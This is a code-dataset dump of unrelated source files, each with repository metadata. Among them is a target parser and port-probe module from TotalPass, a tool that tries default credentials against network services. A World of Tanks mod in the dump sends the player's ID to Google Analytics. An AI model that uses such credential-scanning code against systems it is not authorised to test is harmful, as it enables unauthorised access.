# -*- coding: utf-8 -*-
"""The main validator class."""
from __future__ import unicode_literals
import errno
import fnmatch
import logging
import os
import re
import subprocess
import sys
import vnujar
LOGGER = logging.getLogger(__name__)
DEFAULT_IGNORE_RE = [
r'\APicked up _JAVA_OPTIONS:.*',
r'\ADocument checking completed. No errors found.*',
]
DEFAULT_IGNORE = [
'{"messages":[]}'
]
DEFAULT_IGNORE_XML = [
'</messages>',
'<?xml version=\'1.0\' encoding=\'utf-8\'?>',
'<messages xmlns="http://n.validator.nu/messages/">'
]
class JavaNotFoundException(Exception):
"""Error raised is there is no Java found"""
def __str__(self):
return ('Missing Java Runtime Environment on this system. '
'The command "java" must be available.')
def all_files(directory='.', match='*.html', blacklist=None,
skip_invisible=True):
if blacklist is None:
blacklist = []
if not isinstance(match, list):
match = [match]
files = []
for root, dirnames, filenames in os.walk(directory):
# filter out blacklisted directory names
for b in blacklist:
if b in dirnames:
dirnames.remove(b)
if b in filenames:
filenames.remove(b)
if skip_invisible:
# filter out directory names starting with '.'
invisible_dirs = [d for d in dirnames if d[0] == '.']
for d in invisible_dirs:
dirnames.remove(d)
for pattern in match:
for filename in fnmatch.filter(filenames, pattern):
if skip_invisible and filename[0] == '.':
# filter out invisible files
continue
files.append(os.path.join(root, filename))
return files
def _cygwin_path_convert(filepath):
return subprocess.check_output(
['cygpath', '-w', filepath], shell=False).strip().decode('utf8')
def _normalize_string(s):
s = s.replace('“', '"')
s = s.replace('”', '"')
return s
class Validator(object):
def __init__(self,
ignore=None, ignore_re=None,
errors_only=False, detect_language=True, format=None,
stack_size=None, vnu_args=None):
self.ignore = ignore if ignore else []
self.ignore_re = ignore_re if ignore_re else []
# java options
self.stack_size = stack_size
# vnu options
self.errors_only = errors_only
self.detect_language = detect_language
self.format = format
self.vnu_args = vnu_args
# add default ignore_re
self.ignore_re += DEFAULT_IGNORE_RE
# add default ignore
self.ignore += DEFAULT_IGNORE
# process fancy quotes in ignore
self.ignore = [_normalize_string(s) for s in self.ignore]
self.ignore_re = [_normalize_string(s) for s in self.ignore_re]
# Determine jar location.
self.vnu_jar_location = (vnujar.__file__
.replace('__init__.pyc', 'vnu.jar')
.replace('__init__.py', 'vnu.jar'))
if sys.platform == 'cygwin':
self.vnu_jar_location = _cygwin_path_convert(
self.vnu_jar_location)
def _java_options(self):
java_options = []
if self.stack_size is not None:
java_options.append('-Xss{}k'.format(self.stack_size))
return java_options
def _vnu_options(self):
vnu_options = []
if self.errors_only:
vnu_options.append('--errors-only')
if not self.detect_language:
vnu_options.append('--no-langdetect')
if self.format is not None:
vnu_options.append('--format')
vnu_options.append(self.format)
if self.vnu_args is not None:
vnu_options += self.vnu_args
return vnu_options
def run_vnu(self, arguments):
try:
cmd = (['java'] + self._java_options()
+ ['-jar', self.vnu_jar_location]
+ arguments)
LOGGER.debug(cmd)
p = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
stdout, stderr = p.communicate()
except OSError as e:
if e.errno == errno.ENOENT:
raise JavaNotFoundException()
else:
raise
except subprocess.CalledProcessError as error:
raise (error.output.decode('utf-8'))
return stdout.decode('utf-8'), stderr.decode('utf-8')
def validate(self, files):
if sys.platform == 'cygwin':
files = [_cygwin_path_convert(f) for f in files]
stdout, stderr = self.run_vnu(self._vnu_options() + files)
# process fancy quotes into standard quotes
stdout = _normalize_string(stdout)
stderr = _normalize_string(stderr)
err = stdout.splitlines() + stderr.splitlines()
# Removes any empty items in the list
err = list(filter(None, err))
# Prevents removal of xml tags if there are errors
if self.format == "xml" and len(err) < 4:
self.ignore = DEFAULT_IGNORE_XML
LOGGER.debug(err)
for ignored in self.ignore:
err = [line for line in err if ignored not in line]
for ignored in self.ignore_re:
regex = re.compile(ignored)
err = [line for line in err if not regex.search(line)]
if err:
for line in err:
print(line)
else:
LOGGER.info('All good.')
return len(err)
|
robogym/envs/rearrange/blocks_duplicate.py
|
0xflotus/robogym
| 288 |
122769
|
<filename>robogym/envs/rearrange/blocks_duplicate.py
from typing import List
from robogym.envs.rearrange.blocks import BlockRearrangeEnv
from robogym.envs.rearrange.simulation.base import ObjectGroupConfig
class DuplicateBlockRearrangeEnv(BlockRearrangeEnv):
def _sample_random_object_groups(
self, dedupe_objects: bool = False
) -> List[ObjectGroupConfig]:
"""
Create one group of block objects with a random color.
Overwrite the object groups info to contain only one group for all the blocks.
"""
object_groups = super()._sample_random_object_groups()
num_objects = self.parameters.simulation_params.num_objects
first_object_group = object_groups[0]
first_object_group.count = num_objects
first_object_group.object_ids = list(range(num_objects))
object_groups = [first_object_group]
return object_groups
make_env = DuplicateBlockRearrangeEnv.build
|
test_frame/other_tests/test_import_time.py
|
DJMIN/funboost
| 333 |
122786
|
import datetime
print(1,datetime.datetime.now())
import apscheduler
print(2,datetime.datetime.now())
import gevent
print(3,datetime.datetime.now())
import eventlet
print(4,datetime.datetime.now())
import asyncio
print(5,datetime.datetime.now())
import threading
print(6,datetime.datetime.now())
import pymongo
print(7,datetime.datetime.now())
import redis
print(8,datetime.datetime.now())
import pysnooper
print(9,datetime.datetime.now())
|
exercises/ja/exc_02_02_01.py
|
Jette16/spacy-course
| 2,085 |
122792
|
<filename>exercises/ja/exc_02_02_01.py
from spacy.lang.ja import Japanese
nlp = Japanese()
doc = nlp("私はネコを飼っています")
# 単語「ネコ」のハッシュを引く
cat_hash = ____.____.____[____]
print(cat_hash)
# cat_hashを使って文字列を引く
cat_string = ____.____.____[____]
print(cat_string)
|
pipelines/FBCSP.py
|
plcrodrigues/moabb
| 321 |
122794
|
import numpy as np
from pyriemann.estimation import Covariances
from pyriemann.spatialfilters import CSP
from sklearn.feature_selection import SelectKBest, mutual_info_classif
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import make_pipeline
from sklearn.svm import SVC
from moabb.pipelines.utils import FilterBank
parameters = {"C": np.logspace(-2, 2, 10)}
clf = GridSearchCV(SVC(kernel="linear"), parameters)
fb = FilterBank(make_pipeline(Covariances(estimator="oas"), CSP(nfilter=4)))
pipe = make_pipeline(fb, SelectKBest(score_func=mutual_info_classif, k=10), clf)
# this is what will be loaded
PIPELINE = {
"name": "FBCSP + optSVM",
"paradigms": ["FilterBankMotorImagery"],
"pipeline": pipe,
}
|
virtual/lib/python3.6/site-packages/pylint/test/input/func_noerror_builtin_module_test.py
|
drewheathens/The-Moringa-Tribune
| 463 |
122808
|
<reponame>drewheathens/The-Moringa-Tribune
"""test import from a builtin module"""
from __future__ import absolute_import
from math import log10
__revision__ = None
def log10_2():
"""bla bla bla"""
return log10(2)
|
snorkel/slicing/apply/dask.py
|
melonwater211/snorkel
| 2,906 |
122826
|
<filename>snorkel/slicing/apply/dask.py
from snorkel.labeling.apply.dask import ( # pragma: no cover
DaskLFApplier,
PandasParallelLFApplier,
)
class DaskSFApplier(DaskLFApplier): # pragma: no cover
"""SF applier for a Dask DataFrame.
See ``snorkel.labeling.apply.dask.DaskLFApplier`` for details.
"""
_use_recarray = True
class PandasParallelSFApplier(PandasParallelLFApplier): # pragma: no cover
"""Parallel SF applier for a Pandas DataFrame.
See ``snorkel.labeling.apply.dask.PandasParallelLFApplier`` for details.
"""
_use_recarray = True
|
SimCalorimetry/EcalTrigPrimProducers/python/ecalTriggerPrimitiveDigis_readDBOffline_cff.py
|
ckamtsikis/cmssw
| 852 |
122851
|
import FWCore.ParameterSet.Config as cms
# Trigger Primitive Producer
from SimCalorimetry.EcalTrigPrimProducers.ecalTriggerPrimitiveDigis_readDBOffline_cfi import *
|
fairlearn/metrics/_function_container.py
|
alliesaizan/fairlearn
| 1,142 |
122857
|
# Copyright (c) Microsoft Corporation and Fairlearn contributors.
# Licensed under the MIT License.
from typing import Any, Callable, Dict, Optional
import logging
import numpy as np
logger = logging.getLogger(__name__)
_DEFAULT_NAME = 'metric'
_METRIC_FUNCTION_NONE = "Found 'None' instead of metric function"
_METRIC_FUNCTION_NOT_CALLABLE = "Object passed as metric function not callable"
_SAMPLE_PARAMS_NOT_DICT = "Sample parameters must be a dictionary"
class FunctionContainer:
"""A helper class for metrics.
Parameters
----------
func : Callable
The metric function
name : str
The name of the metric. If ``None`` then the ``__name__``
property of the ``func`` is used, or if that is not available
a default is used.
sample_params : dict[str,array_like]
Sample parameters, which are to be sliced up along with
``y_true`` and ``y_pred``
"""
def __init__(self,
func: Callable,
name: Optional[str],
sample_params: Optional[Dict[str, Any]]):
"""Read a placeholder comment."""
if func is None:
raise ValueError(_METRIC_FUNCTION_NONE)
if not callable(func):
raise ValueError(_METRIC_FUNCTION_NOT_CALLABLE)
self._func = func
if name is None:
if hasattr(func, '__name__'):
self._name = func.__name__
else:
logger.warning("Supplied 'func' had no __name__ attribute")
self._name = _DEFAULT_NAME
else:
self._name = name
self._sample_params = dict()
if sample_params is not None:
if not isinstance(sample_params, dict):
raise ValueError(_SAMPLE_PARAMS_NOT_DICT)
for k, v in sample_params.items():
if v is not None:
# Coerce any sample_params to being ndarrays for easy masking
self._sample_params[k] = np.asarray(v)
@property
def func_(self) -> Callable:
"""Return the contained metric function."""
return self._func
@property
def name_(self) -> str:
"""Return the name of the metric."""
return self._name
@property
def sample_params_(self) -> Dict[str, np.ndarray]:
"""Return the dictionary of sample parameters (as ndarray)."""
return self._sample_params
def generate_sample_params_for_mask(self,
mask: np.ndarray) -> Dict[str, np.ndarray]:
"""Return the sample parameters selected by the given mask."""
curr_sample_params = dict()
for name, value in self.sample_params_.items():
curr_sample_params[name] = value[mask]
return curr_sample_params
def evaluate(self,
y_true,
y_pred,
mask: np.ndarray) -> Any:
"""Evaluate the metric for the given mask and input data.
The mask will be applied to ``y_true``, ``y_pred`` and
the sample parameters.
"""
# Following are internal sanity checks
assert isinstance(y_true, np.ndarray)
assert isinstance(y_pred, np.ndarray)
assert len(y_true) == len(y_pred)
assert len(y_true) == len(mask)
params = self.generate_sample_params_for_mask(mask)
return self.func_(y_true[mask], y_pred[mask], **params)
def evaluate_all(self,
y_true,
y_pred) -> Any:
"""Evaluate the metric on all data."""
return self.func_(y_true, y_pred, **self.sample_params_)
|
tests/pyb/modstm.py
|
learnforpractice/micropython-cpp
| 13,648 |
122883
|
# test stm module
import stm
import pyb
# test storing a full 32-bit number
# turn on then off the A15(=yellow) LED
BSRR = 0x18
stm.mem32[stm.GPIOA + BSRR] = 0x00008000
pyb.delay(100)
print(hex(stm.mem32[stm.GPIOA + stm.GPIO_ODR] & 0x00008000))
stm.mem32[stm.GPIOA + BSRR] = 0x80000000
print(hex(stm.mem32[stm.GPIOA + stm.GPIO_ODR] & 0x00008000))
|
bazel/toolchain/aarch64-none-linux-gnu/cc_toolchain_config.bzl
|
mazzystr/kubevirt
| 3,231 |
122934
|
<gh_stars>1000+
load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES")
load(
"@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl",
"feature",
"flag_group",
"flag_set",
"tool_path",
)
all_link_actions = [
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
]
all_compile_actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.clif_match,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.lto_backend,
ACTION_NAMES.preprocess_assemble,
]
def _impl(ctx):
tool_paths = [
tool_path(
name = "ar",
path = "wrappers/aarch64-none-linux-gnu-ar",
),
tool_path(
name = "cpp",
path = "wrappers/aarch64-none-linux-gnu-cpp",
),
tool_path(
name = "gcc",
path = "wrappers/aarch64-none-linux-gnu-gcc",
),
tool_path(
name = "gcov",
path = "wrappers/aarch64-none-linux-gnu-gcov",
),
tool_path(
name = "ld",
path = "wrappers/aarch64-none-linux-gnu-ld",
),
tool_path(
name = "nm",
path = "wrappers/aarch64-none-linux-gnu-nm",
),
tool_path(
name = "objdump",
path = "wrappers/aarch64-none-linux-gnu-objdump",
),
tool_path(
name = "strip",
path = "wrappers/aarch64-none-linux-gnu-strip",
),
]
default_compiler_flags = feature(
name = "default_compiler_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_compile_actions,
flag_groups = [
flag_group(
flags = [
"-no-canonical-prefixes",
"-fno-canonical-system-headers",
"-Wno-builtin-macro-redefined",
"-D__DATE__=\"redacted\"",
"-D__TIMESTAMP__=\"redacted\"",
"-D__TIME__=\"redacted\"",
],
),
],
),
],
)
default_linker_flags = feature(
name = "default_linker_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([
flag_group(
flags = [
"-lstdc++",
],
),
]),
),
],
)
features = [
default_compiler_flags,
default_linker_flags,
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
cxx_builtin_include_directories = [
"/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/include/c++/10.2.1/",
"/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/libc/usr/include/",
"/proc/self/cwd/external/aarch64-none-linux-gnu/lib/gcc/aarch64-none-linux-gnu/10.2.1/include/",
"/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/libc/lib/",
],
features = features,
toolchain_identifier = "aarch64-toolchain",
host_system_name = "local",
target_system_name = "unknown",
target_cpu = "unknown",
target_libc = "unknown",
compiler = "unknown",
abi_version = "unknown",
abi_libc_version = "unknown",
tool_paths = tool_paths,
)
cc_toolchain_config = rule(
implementation = _impl,
attrs = {},
provides = [CcToolchainConfigInfo],
)
|
totalpass/target.py
|
0xHJK/TotalPass
| 153 |
122936
|
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
"""
格式化目标对象
"""
import os
import re
import sys
import copy
import logging
import socket
import click
from netaddr import IPNetwork
from netaddr.core import AddrFormatError
from .settings import opts
from . import addons
class Target(object):
"""
测试目标对象,不同目标之间IP、端口、分类均不同
"""
logger = logging.getLogger("TotalPass")
def __init__(self, host=None, port=None, category=None, protocol=None, url=None):
self.logger = Target.logger
self.host = host
port = port or opts.port
port = int(re.sub(r"\D", "", str(port))) if port else None
self.port = port if port and 0 < port < 65535 else None
self.category = category or protocol
self.protocol = protocol
self.url = url
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __repr__(self):
s1 = "%s://" % self.protocol if self.protocol else ""
s2 = self.host or ""
s3 = ":%s" % self.port if self.port else ""
s = s1 + s2 + s3 if s2 else ""
return s
def alive(self) -> bool:
"""
检查端口是否开放
"""
if not self.port:
click.secho("[x] %s No port specified." % self.host, fg="red")
return False
addr = (self.host, int(self.port))
try:
# 检测TCP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(opts.timeout_alive)
s.connect(addr)
s.close()
click.secho("[+] [TCP] %s:%s is open." % (self.host, self.port), fg="green")
return True
except ConnectionRefusedError as e:
# 检测UDP
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(opts.timeout_alive)
s.connect(addr)
s.close()
click.secho("[+] [UDP] %s:%s is open." % (self.host, self.port), fg="green")
return True
except Exception as e:
click.secho("[x] %s:%s is close." % (self.host, self.port), fg="red")
self.logger.debug("%s Exception: %s" % (type(e).__name__, str(e)))
return False
def load_scanners(self) -> list:
"""
加载对应的扫描器
"""
scanners = []
if self.category and self.category in addons.__all__:
addon = sys.modules.get("%s.addons.%s" % (__package__, self.category))
self.logger.info("Creating %s %s scanners..." % (self.category, self))
for passwd in opts.passwds:
if passwd.category != self.category and passwd.category != opts.common:
continue
for cred in passwd.credentials:
scanners.append(
addon.mkscanner(
passwd,
self,
cred.get("username", ""),
cred.get("password", ""),
)
)
else:
click.secho(
"[x] #%s %s is not yet supported." % (self.category, self), fg="red"
)
return scanners
@classmethod
def parse(cls, target) -> list:
"""
解析目标主机生成target list
target 可能是tuple/list/str或文件
"""
mid_targets = [] # 中间结果
ret_targets = [] # 最终结果(补全了端口)
if isinstance(target, str):
if os.path.isfile(target):
# TODO
pass
else:
mid_targets = cls._parse_str(target)
elif isinstance(target, tuple) or isinstance(target, list):
for t in target:
mid_targets += cls._parse_str(t)
# return mid_targets
# 为targets补全端口和分类
for t in mid_targets:
if t.category:
t.port = t.port or opts.port or opts.port_map.get(t.category, 0)
ret_targets.append(t)
else:
for cat in opts.categories:
nt = copy.deepcopy(t)
nt.category = cat
nt.port = nt.port or opts.port or opts.port_map.get(cat, 0)
ret_targets.append(nt)
return ret_targets
@classmethod
def _parse_str(cls, target) -> list:
"""
解析字符串形式的目标
"""
cls.logger.info("Parsing target %s" % target)
if not isinstance(target, str):
cls.logger.error("Target %s is not str" % target)
return []
target = target.strip().rstrip("/")
targets = []
try:
for ip in IPNetwork(target).iter_hosts(): # (covers IP or cidr) #3,4
targets.append(Target(host=str(ip)))
except AddrFormatError:
if len(target.split(":")) == 3:
# mysql://127.0.0.1:3306
protocol = target.split(":")[0]
host = target.split(":")[1].replace("//", "")
port = target.split(":")[2]
targets.append(Target(host=host, port=port, protocol=protocol))
elif "://" in target:
# snmp://127.0.0.1
protocol = target.split(":")[0]
host = target.split(":")[1].replace("//", "")
targets.append(Target(host=host, protocol=protocol))
elif ":" in target:
# 127.0.0.1:8080
host = target.split(":")[0]
port = target.split(":")[1]
targets.append(Target(host=host, port=port))
else:
targets.append(Target(host=target))
return targets
|
spk/haproxy/src/app/application/db_upgrade_16.py
|
BKSteve/spksrc
| 2,211 |
122956
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from db import *
from direct import Configuration
def upgrade():
config = Configuration()
session = Session()
frontend = session.query(Frontend).\
filter_by(name='https',
binds=':5443 ssl crt /usr/local/haproxy/var/crt/default.pem',
options=r'option http-server-close,option forwardfor,rspirep ^Location:\ http://(.*)$ Location:\ https://\1').\
first()
if frontend:
frontend.binds += ' ciphers AESGCM+AES128:AES128:AESGCM+AES256:AES256:RSA+RC4+SHA:!RSA+AES:!CAMELLIA:!aECDH:!3DES:!DSS:!PSK:!SRP:!aNULL no-sslv3'
frontend.options += r', rspadd Strict-Transport-Security:\ max-age=31536000;\ includeSubDomains'
session.commit()
config.write(restart=False)
if __name__ == '__main__':
upgrade()
|
DOC/bin/body.py
|
notinaboat/pigpio
| 109 |
122975
|
<gh_stars>100-1000
#!/usr/bin/env python3
import glob
for fn in glob.glob("src/html/*.html"):
f = open(fn)
h = f.read()
f.close()
s1,d1,e1=h.partition("<body>")
s2,d2,e2=e1.partition("</body>")
f = open("tmp/body/" + fn[9:-5] + ".body", "w")
f.write(s2)
f.close()
|
valentyusb/usbcore/tx/nrzi.py
|
rjeschmi/valentyusb
| 105 |
123000
|
#!/usr/bin/env python3
import unittest
from migen import *
from .tester import module_tester
from ..test.common import BaseUsbTestCase
class TxNRZIEncoder(Module):
"""
NRZI Encode
In order to ensure there are enough bit transitions for a receiver to recover
the clock usb uses NRZI encoding. This module processes the incoming
dj, dk, se0, and valid signals and decodes them to data values. It
also pipelines the se0 signal and passes it through unmodified.
https://www.pjrc.com/teensy/beta/usb20.pdf, USB2 Spec, 7.1.8
https://en.wikipedia.org/wiki/Non-return-to-zero
Clock Domain
------------
usb_48 : 48MHz
Input Ports
-----------
i_valid : Signal(1)
Qualifies oe, data, and se0.
i_oe : Signal(1)
Indicates that the transmit pipeline should be driving USB.
i_data : Signal(1)
Data bit to be transmitted on USB. Qualified by o_valid.
i_se0 : Signal(1)
Overrides value of o_data when asserted and indicates that SE0 state
should be asserted on USB. Qualified by o_valid.
Output Ports
------------
o_usbp : Signal(1)
Raw value of USB+ line.
o_usbn : Signal(1)
Raw value of USB- line.
o_oe : Signal(1)
When asserted it indicates that the tx pipeline should be driving USB.
"""
def __init__(self):
self.i_valid = Signal()
self.i_oe = Signal()
self.i_data = Signal()
# Simple state machine to perform NRZI encoding.
self.submodules.nrzi = nrzi = FSM()
usbp = Signal(1)
usbn = Signal(1)
oe = Signal(1)
# wait for new packet to start
nrzi.act("IDLE",
usbp.eq(1),
usbn.eq(0),
oe.eq(0),
If(self.i_valid,
If(self.i_oe,
# first bit of sync always forces a transition, we idle
# in J so the first output bit is K.
NextState("DK")
)
)
)
# the output line is in state J
nrzi.act("DJ",
usbp.eq(1),
usbn.eq(0),
oe.eq(1),
If(self.i_valid,
If(~self.i_oe,
NextState("SE0A")
).Elif(self.i_data,
NextState("DJ")
).Else(
NextState("DK")
)
)
)
# the output line is in state K
nrzi.act("DK",
usbp.eq(0),
usbn.eq(1),
oe.eq(1),
If(self.i_valid,
If(~self.i_oe,
NextState("SE0A")
).Elif(self.i_data,
NextState("DK")
).Else(
NextState("DJ")
)
)
)
# first bit of the SE0 state
nrzi.act("SE0A",
usbp.eq(0),
usbn.eq(0),
oe.eq(1),
If(self.i_valid,
NextState("SE0B")
)
)
# second bit of the SE0 state
nrzi.act("SE0B",
usbp.eq(0),
usbn.eq(0),
oe.eq(1),
If(self.i_valid,
NextState("EOPJ")
)
)
# drive the bus back to J before relinquishing control
nrzi.act("EOPJ",
usbp.eq(1),
usbn.eq(0),
oe.eq(1),
If(self.i_valid,
NextState("IDLE")
)
)
# flop all outputs
self.o_usbp = Signal(1)
self.o_usbn = Signal(1)
self.o_oe = Signal(1)
self.sync += [
self.o_oe.eq(oe),
self.o_usbp.eq(usbp),
self.o_usbn.eq(usbn),
]
|
.deprecated/mod_armoring_extended/mod_armoring_extended203.py
|
angelsoft1/spoter-mods
| 150 |
123044
|
<reponame>angelsoft1/spoter-mods<gh_stars>100-1000
# -*- coding: utf-8 -*-
import datetime
import re
import random
import string
import os
import json
import codecs
import urllib2
import urllib
import threading
import weakref
from functools import partial
import BigWorld
import Math
import GUI
import Keys
import game
from constants import AUTH_REALM, VEHICLE_HIT_EFFECT
from gui import InputHandler, g_guiResetters
from gui.Scaleform import Minimap
from gui.Scaleform.Flash import Flash
from gui.Scaleform.Battle import Battle
from gui.Scaleform.daapi.view.lobby.hangar import Hangar
from Vehicle import Vehicle
from VehicleEffects import DamageFromShotDecoder
from gui.app_loader import g_appLoader
class Config(object):
def __init__(self):
self.enable = True
self.debug = False
self.ru = True if AUTH_REALM == 'RU' else False
self.version = 'v2.03(30.08.2015)'
self.author = 'by spoter, reven86'
self.description = 'armoring_extended'
self.name = 'armoring_extended'
self.description_analytics = 'Мод: "Броняня"'
self.description_ru = 'Мод: "Броняня"'
self.author_ru = 'авторы: spoter, reven86'
self.tid = 'UA-57975916-9'
self.setup = {'MODIFIER': {'MODIFIER_NONE': 0, 'MODIFIER_SHIFT': 1, 'MODIFIER_CTRL': 2, 'MODIFIER_ALT': 4}}
self.sys_mes = {}
self._thread_analytics = None
self.analytics_started = False
self.language = None
self.xvm_installed = False
self.xvm_check()
self.res_mods = self.res_mods_init()
self.data = {}
self.default_config()
new_config = self.load_json(self.name, self.data)
self.data = new_config
if 'Русский' in self.data['config'].get('language'): self.ru = True
if self.ru:
self.description = self.description_ru
self.author = self.author_ru
@staticmethod
def res_mods_init():
wd = os.path.dirname(os.path.realpath(__file__))
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
return wd
def xvm_check(self):
try:
#
import xvm_main
self.xvm_installed = True
except StandardError:
pass
def default_config(self):
self.data = {
'config': {
'enable': True, 'debug': False, 'activate_message': True, 'only_HeavyTank': False, 'language': 'Русский'
}, 'language': {
'Русский': {
'main_text': 'Танканул <font color="#fdf498">{NumDmg}</font> раз(а) на <img align="top" src="img://gui/maps/icons/library/ClanBattleResultIcon-1.png" height="16" width="16" '
'vspace="-3" /><font color="#fdf498">{AvgDmg}</font> урона', 'activate_message': 'Броняня: Активирована',
'activate_message_only_HeavyTank': 'Броняня: Активирована, режим ТТ'
}, 'English': {
'main_text': '<font color="#fdf498">{NumDmg}</font> Blocked <img align="top" src="img://gui/maps/icons/library/ClanBattleResultIcon-1.png" height="16" width="16" vspace="-3" '
'/><font color="#fdf498">{AvgDmg}</font> damage', 'activate_message': 'Armoring Extended: Activated',
'activate_message_only_HeavyTank': 'Armoring Extended: Activated, only Heavy Tanks'
}, 'Deutsch': {
'main_text': '<font color="#fdf498">{NumDmg}</font> Blocked <img align="top" src="img://gui/maps/icons/library/ClanBattleResultIcon-1.png" height="16" width="16" vspace="-3" '
'/><font color="#fdf498">{AvgDmg}</font> Schaden', 'activate_message': 'Armoring Extended: Aktiviert',
'activate_message_only_HeavyTank': 'Armoring Extended: Aktiviert, nur schwere Panzer'
}
}, 'flash': {
'text': {
'x': 20, 'y': 450, 'alignX': 'left', 'alignY': 'top', 'default_font': '$IMELanguageBar', 'default_font_size': 14, 'default_font_color': '#BDFA64'
}, 'background': {
'enable': False, 'image': 'img://../res_mods/configs/spoter_mods/%s/background.png' % self.name, 'x': 18, 'y': 448, 'width': 250, 'height': 27, 'alpha': 80
}, 'shadow': {
'enable': True, 'distance': 0, 'angle': 0, 'color': '#000000', 'alpha': 60, 'size': 40, 'strength': 500
}
}
}
def do_config(self):
self.enable = self.data['config'].get('enable', False)
self.debug = self.data['config'].get('debug', False)
if self.data['config'].get('language') in self.data['language']:
self.language = self.data['language'].get(self.data['config'].get('language'))
else:
self.data['config']['language'] = 'English'
self.language = self.data['language'].get('English')
if armor.flash:
text = self.data['flash'].get('text')
background = self.data['flash'].get('background')
shadow = self.data['flash'].get('shadow')
if text:
armor.flash.data.set_text_config(text.get('x', 0), text.get('y', 0), text.get('alignX', 'left'), text.get('alignY', 'top'), text.get('default_font', '$IMELanguageBar'),
text.get('default_font_size', 14), text.get('default_font_color', '#BDFA64'))
if background:
armor.flash.data.set_background_config(background.get('enable'), background.get('image'), background.get('x'), background.get('y'), background.get('width'), background.get('height'),
background.get('alpha'))
if shadow:
armor.flash.data.set_shadow_config(shadow.get('enable'), shadow.get('distance'), shadow.get('angle'), shadow.get('color'), shadow.get('alpha'), shadow.get('size'),
shadow.get('strength'))
def update_cord(self, text_x, text_y, back_x, back_y):
flash = self.data['flash']
text = flash.get('text')
background = flash.get('background')
text['x'] = text_x
text['y'] = text_y
background['x'] = back_x
background['y'] = back_y
def byte_ify(self, inputs):
if inputs:
if isinstance(inputs, dict):
return {self.byte_ify(key): self.byte_ify(value) for key, value in inputs.iteritems()}
elif isinstance(inputs, list):
return [self.byte_ify(element) for element in inputs]
elif isinstance(inputs, unicode):
return inputs.encode('utf-8')
else:
return inputs
return inputs
@staticmethod
def json_comments(text):
regex = r'\s*(#|\/{2}).*$'
regex_inline = r'(:?(?:\s)*([A-Za-z\d\.{}]*)|((?<=\").*\"),?)(?:\s)*(((#|(\/{2})).*)|)$'
lines = text.split('\n')
excluded = []
for index, line in enumerate(lines):
if re.search(regex, line):
if re.search(r'^' + regex, line, re.IGNORECASE):
excluded.append(lines[index])
elif re.search(regex_inline, line):
lines[index] = re.sub(regex_inline, r'\1', line)
for line in excluded:
lines.remove(line)
return '\n'.join(lines)
def load_json(self, name, config_old, save=False):
config_new = config_old
path = './res_mods/configs/spoter_mods/%s/' % self.name
if not os.path.exists(path):
os.makedirs(path)
new_path = '%s%s.json' % (path, name)
if save:
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
else:
if os.path.isfile(new_path):
try:
with codecs.open(new_path, 'r', encoding='utf-8-sig') as json_file:
data = self.json_comments(json_file.read().decode('utf-8-sig'))
config_new = self.byte_ify(json.loads(data))
json_file.close()
except Exception as e:
self.sys_mess()
print '%s%s' % (self.sys_mes['ERROR'], e)
else:
self.sys_mess()
print '%s[%s, %s %s]' % (self.sys_mes['ERROR'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG'])
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG_DONE'])
return config_new
@staticmethod
def code_pa(text):
try:
return text.encode('windows-1251')
except StandardError:
return text
def debugs(self, text):
if self.debug:
try:
text = text.encode('windows-1251')
except StandardError:
pass
print '%s%s [%s]: %s' % (datetime.datetime.now(), self.sys_mes['DEBUG'], self.code_pa(self.description), text)
def analytics_do(self):
if not self.analytics_started:
player = BigWorld.player()
param = urllib.urlencode({
'v': 1, # Version.
'tid': '%s' % self.tid, # Tracking ID / Property ID.
'cid': player.databaseID, # Anonymous Client ID.
't': 'screenview', # Screenview hit type.
'an': '%s' % self.description_analytics, # App name.
'av': '%s %s' % (self.description_analytics, self.version), # App version.
'cd': 'start [%s]' % AUTH_REALM # Screen name / content description.
})
self.debugs('http://www.google-analytics.com/collect?%s' % param)
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
def analytics(self):
self._thread_analytics = threading.Thread(target=self.analytics_do, name='Thread')
self._thread_analytics.start()
def sys_mess(self):
self.sys_mes = {
'DEBUG': '[DEBUG]', 'LOAD_MOD': self.code_pa('[ЗАГРУЗКА]: ') if self.ru else '[LOAD_MOD]: ', 'INFO': self.code_pa('[ИНФО]: ') if self.ru else '[INFO]: ',
'ERROR': self.code_pa('[ОШИБКА]: ') if self.ru else '[ERROR]: ',
'MSG_RECREATE_CONFIG': self.code_pa('конфиг не найден, создаем заново') if self.ru else 'Config not found, recreating',
